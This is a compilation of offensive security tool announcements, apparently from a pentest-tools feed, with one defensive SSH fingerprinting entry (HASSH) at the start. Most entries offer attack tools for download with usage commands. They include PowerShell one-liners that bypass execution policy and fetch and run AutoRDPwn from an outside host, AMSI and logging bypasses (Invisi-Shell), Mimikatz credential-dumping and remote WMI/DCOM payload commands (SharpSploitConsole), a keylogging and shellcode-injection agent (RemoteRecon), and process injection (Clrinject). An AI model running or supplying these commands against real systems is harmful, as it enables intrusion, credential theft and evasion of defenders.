HASSH – A Network Fingerprinting Standard Which Can Be Used To Identify Specific Client And Server SSH Implementations

“HASSH" is a network fingerprinting standard which can be used to identify specific Client and Server SSH implementations. The fingerprints can be easily stored, searched and shared in the form of an MD5 fingerprint.What can HASSH help with:Use in highly controlled, well understood environments, where any fingerprints outside of a known good set are alertable.It is possible to detect, control and investigate brute force or Cred Stuffing password attempts at a higher level of granularity than IP Source – which may be impacted by NAT or botnet-like behaviour. The hassh will be a feature of the specific Client software implementation being used, even if the IP is NATed such that it is shared by many other SSH clients.Detect covert exfiltration of data within the components of the Client algorithm sets. In this case, a specially coded SSH Client can send data outbound from a trusted to a less trusted environment within a series of SSH_MSG_KEXINIT packets. In a scenario similar to the more known exfiltration via DNS, data could be sent as a series of attempted, but incomplete and unlogged connections to an SSH server controlled by bad actors who can then record, decode and reconstitute these pieces of data into their original form. Until now such attempts – much less the contents of the clear text packets – are not logged even by mature packet analyzers or on end point systems. Detection of this style of exfiltration can now be performed easily by using anomaly detection or alerting on SSH Clients with multiple different hasshUse in conjunction with other contextual indicators, for example detect Network discovery and Lateral movement attempts by unusual hassh such as those used by Paramiko, Powershell, Ruby, Meterpreter, Empire.Share malicious hassh as Indicators of Compromise.Create an additional level of Client application control, for example one could block all Clients from connecting to an SSH server that are outside of an approved known set of hassh values.Contribute to Non Repudiation in a Forensic context – at a higher level of abstraction than IPSource – which may be impacted by NAT, or where multiple IP Sources are used.Detect Deceptive Applications. Eg a hasshServer value known to belong to the Cowry/Kippo SSH honeypot server installation, which is purporting to be a common OpenSSH server in the Server String.Detect devices having a hassh known to belong to IOT embedded systems. Examples may include cameras, mics, keyloggers, wiretaps that could be easily be hidden from view and communicating quietly over encrypted channels back to a control server.How does HASSH work:"hassh" and "hasshServer" are MD5 hashes constructed from a specific set of algorithms that are supported by various SSH Client and Server Applications. These algorithms are exchanged after the initial TCP three-way handshake as clear-text packets known as "SSH_MSG_KEXINIT" messages, and are an integral part of the setup of the final encrypted SSH channel. The existence and ordering of these algorithms is unique enough such that it can be used as a fingerprint to help identify the underlying Client and Server application or unique implementation, regardless of higher level ostensible identifiers such as "Client" or "Server" strings.References:RFC4253 The Secure Shell (SSH) Transport Layer ProtocolSalesforce Engineering blogCredits:hassh and hasshServer were conceived and developed by (@benreardon) within the Detection Cloud Team at Salesforce, with inspiration and contributions from (@0x4d31) and the JA3 crew crew: , and Download Hassh

Link: http://feedproxy.google.com/~r/PentestTools/~3/K_mGl9HjOe4/hassh-network-fingerprinting-standard.html

AutoRDPwn v4.5 – The Shadow Attack Framework

AutoRDPwn is a script created in Powershell and designed to automate the Shadow attack on Microsoft Windows computers. This vulnerability allows a remote attacker to view his victim’s desktop without his consent, and even control it on request. For its correct operation, it is necessary to comply with the requirements described in the user guide.RequirementsPowershell 5.0 or higherChangesVersion 4.5• New ninja style icon!• Automatic cleaning of Powershell history after execution• Now all dependencies are downloaded from the same repository• Many errors and bugs fixed• UAC & AMSI bypass in 64-bit systems• New module available: Remote Desktop Caching• New module available: Disable system logs (Invoke-Phant0m)• New module available: Sticky Keys Hacking• New available module: Remote Desktop History• New available attack: Session Hijacking (passwordless)WARNING! This attack is very intrusive and can only be used locally*The rest of the changes can be consulted in the CHANGELOG fileUseThis application can be used locally, remotely or to pivot between computers. Thanks to the additional modules, it is possible to dump hashes and passwords or even recover the history of RDP connections.One line execution:powershell -ep bypass “cd $env:temp ; iwr https://darkbyte.net/autordpwn.php -outfile AutoRDPwn.ps1 ; .\AutoRDPwn.ps1"The detailed guide of use can be found at the following link:https://darkbyte.net/autordpwn-la-guia-definitivaScreenshotsCredits and Acknowledgments• Mark Russinovich for his tool PsExec -> https://docs.microsoft.com/en-us/sysinternals/downloads/psexec• HarmJ0y & Matt Graeber for his script Get-System -> https://github.com/HarmJ0y/Misc-PowerShell• Stas’M Corp. for its RDP tool Wrapper -> https://github.com/stascorp/rdpwrap• Kevin Robertson for his script Invoke-TheHash -> https://github.com/Kevin-Robertson/Invoke-TheHash• Benjamin Delpy for his tool Mimikatz -> https://github.com/gentilkiwi/mimikatz• Halil Dalabasmaz for his script Invoke-Phant0m -> https://github.com/hlldz/Invoke-Phant0mContactThis software does not offer any kind of guarantee. Its use is exclusive for educational environments and / or security audits with the corresponding consent of the client. I am not responsible for its misuse or for any possible damage caused by it.For more information, you can contact through info@darkbyte.netDownload AutoRDPwn

Link: http://feedproxy.google.com/~r/PentestTools/~3/ZHHxiH4qJi0/autordpwn-v45-shadow-attack-framework.html

Invisi-Shell – Hide Your Powershell Script In Plain Sight (Bypass All Powershell Security Features)

Hide your powershell script in plain sight! Invisi-Shell bypasses all of Powershell security features (ScriptBlock logging, Module logging, Transcription, AMSI) by hooking .Net assemblies. The hook is performed via CLR Profiler API.Work In ProgressThis is still a preliminary version intended as a POC. The code works only on x64 processes and tested against Powershell V5.1.UsageCopy the compiled InvisiShellProfiler.dll from /x64/Release/ folder with the two batch files from the root directory (RunWithPathAsAdmin.bat & RunWithRegistryNonAdmin.bat) to the same folder.Run either of the batch files (depends if you have local admin privelledges or not)Powershell console will run. Exit the powershell using the exit command (DON’T CLOSE THE WINDOW) to allow the batch file to perform proper cleanup.CompilationProject was created with Visual Studio 2013. You should install Windows Platform SDK to compile it properly.Detailed DescriptionMore info can be found on the DerbyCon presentation by Omer Yair (October, 2018).CreditsCorProfiler by .NET FoundationEyal Ne’emanyGuy FrancoEphraim NeubergerYossi SassiOmer YairDownload Invisi-Shell

Link: http://www.kitploit.com/2018/11/invisi-shell-hide-your-powershell.html

ADModule – Microsoft Signed ActiveDirectory PowerShell Module

Microsoft signed DLL for the ActiveDirectory PowerShell moduleJust a backup for the Microsoft’s ActiveDirectory PowerShell module from Server 2016 with RSAT and module installed. The DLL is usually found at this path: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.ActiveDirectory.Managementand the rest of the module files at this path: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\ActiveDirectory\UsageYou can copy this DLL to your machine and use it to enumerate Active Directory without installing RSAT and without having administrative privileges.PS C:> Import-Module C:\ADModule\Microsoft.ActiveDirectory.Management.dll -Verbose To be able to list all the cmdlets in the module, import the module as well. Remember to import the DLL first.PS C:> Import-Module C:\ADModule\Microsoft.ActiveDirectory.Management.dll -VerbosePS C:> Import-Module C:\AD\Tools\ADModule\ActiveDirectory\ActiveDirectory.psd1PS C:> Get-Command -Module ActiveDirectoryBenefitsThere are many benefits like very low chances of detection by AV, very wide coverage by cmdlets (I leave the usage of cmdlets for a later post :P), good filters for cmdlets, signed by Microsoft etc. The most useful one, however, is that this module works flawlessly from PowerShell’s Constrained Language Mode Bloghttps://www.labofapenetrationtester.com/2018/10/domain-enumeration-from-PowerShell-CLM.htmlDownload ADModule

Link: http://www.kitploit.com/2018/11/admodule-microsoft-signed.html

SharpSploitConsole – Console Application Designed To Interact With SharpSploit

Console Application designed to interact with SharpSploit released by @cobbr_ioSharpSploit is a tool written by @cobbr_io that combines many techniques/C# code from the infosec community and combines it into one sweet DLL. It’s awesome so check it out!DescriptionSharpSploit Console is just a quick proof of concept binary to help penetration testers or red teams with less C# experience play with some of the awesomeness that is SharpSploit. By following the instructions below you should be able to embed both the SharpSploit.dll and System.Management.Automation.dll into the SharpSploitConsole binary, creating a standalone exe you can drop on an appropriate target sytem and run over a non-interactive shell (such as beacon).This concept can be applied to many C# binaries. For example, we could embed the System.Management.Automation.dll into our favorite C# NoPowershell.exe, creating a binary that doesn’t rely on the System.Management.Automation.dll on the target system.Contact at:Twitter: @anthemtotheego or @g0ldengunsecSetup – Quick and DirtyNote: For those of you who don’t want to go through the trouble of compiling your own I uploaded an x64 and x86 binary found in the CompiledBinaries folder. For those of you who do want to compile your own… I used Windows 10, Visual Studio 2017 – mileage may varyDownload SharpSploit tool from https://github.com/cobbr/SharpSploit.git Open up SharpSploit.sln in Visual Studio and compile (make sure to compile for correct architecture) – Should see drop down with Any CPU > Click on it and open Configuration Manager > under platform change to desired architecture and select ok. Download SharpSploitConsole tool and open up SharpSploitConsole.sln Copy both SharpSploit.dll and System.Management.Automation.dll found in SharpSploit/bin/x64/Debug directory into SharpSploitConsole/bin/x64/Debug folder Next we will set up visual studio to embed our DLL’s into our exe so we can just have a single binary we can run on our target machine. We will do this by doing the following: In visual studio:a. Tools > NuGet Package Manager > Package Manager Consoleb. Inside console run: Install-Package Costura.Fodyc. Open up notepad and paste the following code below and save it with the name FodyWeavers.xml inside the SharpSploitConsole directory that holds your bin, obj, properties folders. <Weavers> <Costura /> </Weavers>Inside visual studio, right click References on the righthand side, choose Add Reference, then browse to the SharpSploitConsole/bin/x64/Debug directory where we put our two DLL’s, select them and add them. Compile, drop binary on target computer and have fun. ExamplesNote: All commands are case insensitiveBy default all commands can be taken in as command line args, they will be executed and the program will exit (great for remote shells). This looks something like the following: sharpSploitConsole.exe getSystem logonPasswords. Alternatively, if you want to use the interactive console mode, you can use the interact command to get a pseudo-interactive shell.Start interactive console mode:InteractMimikatz all the things (does not run DCSync) – requires admin or system:Mimi-AllRuns a specific Mimikatz command of your choice – requires admin or system:Mimi-Command privilege::debug sekurlsa::logonPasswordsRuns the Mimikatz command privilege::debug sekurlsa::logonPasswords – requires admin or system:logonPasswordsRuns the Mimikatz command to retrieve Domain Cached Credentials hashes from registry – requires admin or system:LsaCacheRuns the Mimikatz command to retrieve LSA Secrets stored in registry – requires admin or system:LsaSecretsRetrieve password hashes from the SAM database – requires admin or system:SamDumpRetrieve Wdigest credentials from registry – requires admin or system:WdigestRetrieve current user:whoamiUsernameImpersonate system user – requires admin rights:GetSystemImpersonate system user – Impersonate the token of a specified process, requires pid – command requires admin rights:Impersonate 2918Bypass UAC – requires binary | command | path to binary – requires admin rights:BypassUAC cmd.exe ipconfig C:\Windows\System32\BypassUAC cmd.exe "" C:\Windows\System32\Ends the impersonation of any token, reverts back to initial token associated with current process:RevertToSelfRetrieve current working directory:CurrentDirectoryRetrieve current directory listing:DirectoryListingChanges the current directory by appending a specified string to the current working directory:ChangeDirectory SomeFolderRetrieve hostname:HostnameRetrieve list of running processes:ProcessListCreates a minidump of the memory of a running process, requires PID | output location | output name – requires admin:ProcDump 2198 C:\Users\Username\Desktop memorydump.dmpRetrieve registry path value, requires full path argument:ReadRegistry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\COM3\BuildNumberWrite to registry, requires full path argument and value argument:WriteRegistry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\COM3\RemoteAccessEnabled 1Retrieve users of local group remotely, requires computername | groupname | username | password:NetLocalGroupMembers computerName Administrators domain\username P@55w0rd!NetLocalGroupMembers 192.168.1.20 Administrators .\username P@55w0rd!Retrieve local groups remotely, requires computername | username | password:NetLocalGroups computerName domain\username P@55w0rd!NetLocalGroups 192.168.1.20 .\username P@55w0rd!Retrieve current logged on users remotely, requires computername | username | password:NetLoggedOnUsers computerName domain\username P@55w0rd!NetLoggedOnUsers 192.168.1.20 .\username P@55w0rd!Retrieve user sessions remotely, requires computername | username | password:NetSessions computerName domain\username P@55w0rd!NetSessions 192.168.1.20 .\username P@55w0rd!Ping systems, requires computernames:Ping computer1 computer2 computer3 computer4Port scan systems, requires computername | ports:PortScan computer1 80 443 445 22 23Get Domain Users, Grabs specified (or all) user objects in the target domain, by default will use current user context. optional arguments: -username -password -domain -server -searchbase -searchstring -target:GetDomainUsersGet Domain Groups, Grabs specified (or all) group objects in the target domain, by default will use current user context. optional arguments: -username -password -domain -server -searchbase -searchstring -target:GetDomainGroupsGetDomainGroups -target "Domain Admins"Get Domain Computers, Grabs specified (or all) computer objects in the target domain, by default will use current user context. optional arguments: -username -password -domain -server -searchbase -searchstring -target:GetDomainComputersPerform Kerberoasting, Performs a kerberoasting attack against targeted (or all) user objects in the target domain, by default will use current user context. optional arguments: -username -password -domain -server -searchbase -searchstring -targetKerberoastKerberoast -username bob -password Password1 -domain test.corp -server 192.168.1.10 -target sqlServiceRun command remotely via WMI, requires computername | username | password | command – requires admin:WMI computer1 domain\username P@55w0rd! <entire powershell empire payload>WMI computer1 .\username P@55w0rd! powershell -noP -sta -w 1 -enc <Base64>Run command remotely via DCOM, requires computername | command | directory | params – requires admin:DCOM computer1 cmd.exe c:\Windows\System32 powershell -noP -sta -w 1 -enc <Base64>Run shell command:Shell ipconfig /allRun powershell command while attempting to bypass AMSI, scriptBlock logging, and Module logging:Powershell -noP -sta -w 1 -enc <Base64>Currently available options (more to come)Interact : Starts interactive console mode, if you are interacting remotely you may not want to use this optionMimi-All : Executes everything but DCSync, requires adminMimi-Command : Executes a chosen Mimikatz commandlogonPasswords : Runs privilege::debug sekurlsa::logonPasswordsLsaCache : Retrieve Domain Cached Credentials hashes from registryLsaSecrets : Retrieve LSA secrets stored in registrySamDump : Retrieve password hashes from the SAM databaseWdigest : Retrieve Wdigest credentials from registrywhoami : Retrieve current userGetSystem : Impersonate system user, requires admin rightsImpersonate : Impersonate the token of a specified process, requires pid – command requires admin rights.BypassUAC : Bypass UAC, requires binary | command | path to binary – requires admin rightsRevertToSelf : Ends the impersonation of any token, reverts back to initial token associated with current processCurrentDirectory : Retrieve current working directoryDirectoryListing : Retrieve current directory listingChangeDirectory : Changes the current directory by appending a specified string to the current working directoryHostname : Retrieve hostnameProcessList : Retrieve list of running processesProcDump : Creates a minidump of the memory of a running process, requires PID | output location | output name – requires adminUsername : Retrieve current usernameReadRegistry : Retrieve registry path value, requires full path argumentWriteRegistry : Write to registry, requires full path argument | valueNetLocalGroupMembers : Retrieve users of local group remotely, requires computername | groupname | username | passwordNetLocalGroups : Retrieve local groups remotely, requires computername | username | passwordNetLoggedOnUsers : Retrieve current logged on users remotely, requires computername | username | passwordNetSessions : Retrieve user sessions remotely, requires computername | username | passwordPing : Ping systems, requires computernames"PortScan : Port scan systems, requires computername | portsGetDomainUsers : Grabs specified (or all) user objects in the target domain, by default will use current user contextGetDomainGroups : Grabs specified (or all) group objects in the target domain, by default will use current user contextGetDomainComputers : Grabs specified (or all) computer objects in the target domain, by default will use current user contextKerberoast : Performs a kerberoasting attack against targeted (or all) user objects in the target domain, by default will use current user contextWMI : Run command remotely via WMI, requires computername | username | password | command | requires adminDCOM : Run command remotely via DCOM, requires computername | command | directory | params – requires adminShell : Run a shell commandPowershell : Runs a powershell command while attempting to bypass AMSI, scriptBlock logging, and Module loggingDownload SharpSploitConsole

Link: http://feedproxy.google.com/~r/PentestTools/~3/kATTdJ2komM/sharpsploitconsole-console-application.html

RemoteRecon – Remote Recon And Collection

RemoteRecon provides the ability to execute post-exploitation capabilities against a remote host, without having to expose your complete toolkit/agent. Often times as operator’s we need to compromise a host, just so we can keylog or screenshot (or some other miniscule task) against a person/host of interest. Why should you have to push over beacon, empire, innuendo, meterpreter, or a custom RAT to the target? This increases the footprint that you have in the target environment, exposes functionality in your agent, and most likely your C2 infrastructure. An alternative would be to deploy a secondary agent to targets of interest and collect intelligence. Then store this data for retrieval at your discretion. If these compromised endpoints are discovered by IR teams, you lose those endpoints and the information you’ve collected, but nothing more. Below is a visual representation of how an adversary would utilize this.RemoteRecon utilizes the registry for data storage, with WMI as an internal C2 channel. All commands are executed in a asynchronous, push and pull manner. Meaning that you will send commands via the powershell controller and then retrieve the results of that command via the registry. All results will be displayed in the local console.Current CapabilitiesPowerShellScreenshotToken ImpersonationInject ReflectiveDll (Must Export the ReflectiveLoader function from Stephen Fewer)Inject ShellcodeKeylogImprovements, Additions, ToDo’s:Dynamically Load and execute .NET assembliesSupport non reflective dll’s for injectionBuild DependeciesThe RemoteRecon.ps1 script already contains a fully weaponized JS payload for the Agent. The payload will only be updated as the code base changes.If you wish to make changes to the codebase on your own, there are a few depencies required.Visual Studio 2015+Windows 7 and .NET SDKWindows 8.1 SDKmscorlib.tlh (This is included in the project but there are instances where intellisense can’t seem to find it [shrug]).NET 3.5 & 4James Forshaw’s DotNetToJScript projectFody/Costura Nuget package. Package and embed any extra dependencies in .NET.For a short setup guide, please visit the wikiDownload RemoteRecon

Link: http://feedproxy.google.com/~r/PentestTools/~3/yXXX3vBqgJk/remoterecon-remote-recon-and-collection.html

AutoRDPwn – The Shadow Attack Framework

AutoRDPwn is a script created in Powershell and designed to automate the Shadow attack on Microsoft Windows computers. This vulnerability allows a remote attacker to view his victim’s desktop without his consent, and even control it on request. For its correct operation, it is necessary to comply with the requirements described in the user guide.RequirementsPowershell 5.0 or higherChangesVersion 4.0• Fixed a bug in the scheduled task to remove the user AutoRDPwn• The Scheluded Task attack has been replaced by Invoke-Command• It is now possible to choose the language of the application and launch the attack on English versions of Windows*The rest of the changes can be consulted in the CHANGELOG fileUseExecution in a line:powershell -ExecutionPolicy Bypass “cd $ env: TEMP; iwr https://goo.gl/HSkAXP -Outfile AutoRDPwn.ps1;. \ AutoRDPwn.ps1"The detailed guide of use can be found at the following link:https://darkbyte.net/autordpwn-la-guia-definitivaCredits and Acknowledgments• Mark Russinovich for his tool PsExec -> https://docs.microsoft.com/en-us/sysinternals/downloads/psexec• Stas’M Corp. for its RDP tool Wrapper -> https://github.com/stascorp/rdpwrap• Kevin Robertson for his tool Invoke-TheHash -> https://github.com/Kevin-Robertson/Invoke-TheHash• Benjamin Delpy for his tool Mimikatz -> https://github.com/gentilkiwi/mimikatzContactThis software does not offer any kind of guarantee. Its use is exclusive for educational environments and / or security audits with the corresponding consent of the client. I am not responsible for its misuse or for any possible damage caused by it.For more information, you can contact through info@darkbyte.netDownload AutoRDPwn

Link: http://feedproxy.google.com/~r/PentestTools/~3/FJO5eg5Xcpk/autordpwn-shadow-attack-framework.html

Clrinject – Injects C# EXE Or DLL Assembly Into Every CLR Runtime And AppDomain Of Another Process

Injects C# EXE or DLL Assembly into any CLR runtime and AppDomain of another process. The injected assembly can then access static instances of the injectee process’s classes and therefore affect it’s internal state.Usageclrinject-cli.exe -p -a <assemblyFile>Opens process with id <processId> or name <processName>, inject <assemblyFile> EXE and execute Main method.Additional options-e Enumerates all loaded CLR Runtimes and created AppDomains.-d <#> Inject only into <#>-th AppDomain. If no number or zero is specified, assembly is injected into every AppDomain.-i <namespace>.<className> Create an instance of class <className> from namespace <namespace>.ExamplesUsage examplesclrinject-cli.exe -p victim.exe -e(Enumerate Runtimes and AppDomains from victim.exe)clrinject-cli.exe -p 1234 -a “C:\Path\To\invader.exe" -d 2(Inject invader.exe into second AppDomain from process with id 1234)clrinject-cli.exe -p victim.exe -a "C:\Path\To\invader.dll" -i "Invader.Invader"(Create instance of Invader inside every AppDomain in victim.exe)clrinject-cli64.exe -p victim64.exe -a "C:\Path\To\invader64.exe"(Inject x64 assembly into x64 process)Injectable assembly exampleFollowing code can be compiled as C# executable and then injected into a PowerShell process. This code accessees static instances of internal PowerShell classes to change console text color to green.using System;using System.Reflection;using Microsoft.PowerShell;using System.Management.Automation.Host;namespace Invader{ class Invader { static void Main(string[] args) { try { var powerShellAssembly = typeof(ConsoleShell).Assembly; var consoleHostType = powerShellAssembly.GetType("Microsoft.PowerShell.ConsoleHost"); var consoleHost = consoleHostType.GetProperty("SingletonInstance", BindingFlags.Static | BindingFlags.NonPublic).GetValue(null); var ui = (PSHostUserInterface)consoleHostType.GetProperty("UI").GetValue(consoleHost); ui.RawUI.ForegroundColor = ConsoleColor.Green; } catch (Exception e) { Console.WriteLine(e.ToString()); } } }}Injection command:clrinject-cli64.exe -p powershell.exe -a "C:\Path\To\invader64.exe"Result:Download Clrinject

Link: http://feedproxy.google.com/~r/PentestTools/~3/pK8N-dwlNI8/clrinject-injects-c-exe-or-dll-assembly.html

Operating Offensively Against Sysmon

Sysmon is a tool written by Mark Russinovich that I have covered in multiple blog post and even wrote a PowerShell module called Posh-Sysmon to help with the generation of configuration files for it. Its main purpose is for the tracking of potentially malicious activity on individual hosts and it is based on the same technology as Procmon. It differs from other Sysinternals tools in that Sysmon is actually installed on the host and saves its information in to the Windows Eventlog so it is easier to be able to collect the information with the use of SIEM (Security Information and Event Management) tools. 
 Sysmon has the capability to log information for:
* Process Creation and Termination
* Process changing a file creation time.
* Network Connection
* Driver Load
* Image Load
* CreateRemoteThread
* Raw Access Read of a file
* A process opens another process memory
* File Creation
* Registry Events
* Pipe Events
* WMI Permanent Events 

Link: https://www.darkoperator.com/blog/2018/10/5/operating-offensively-against-sysmon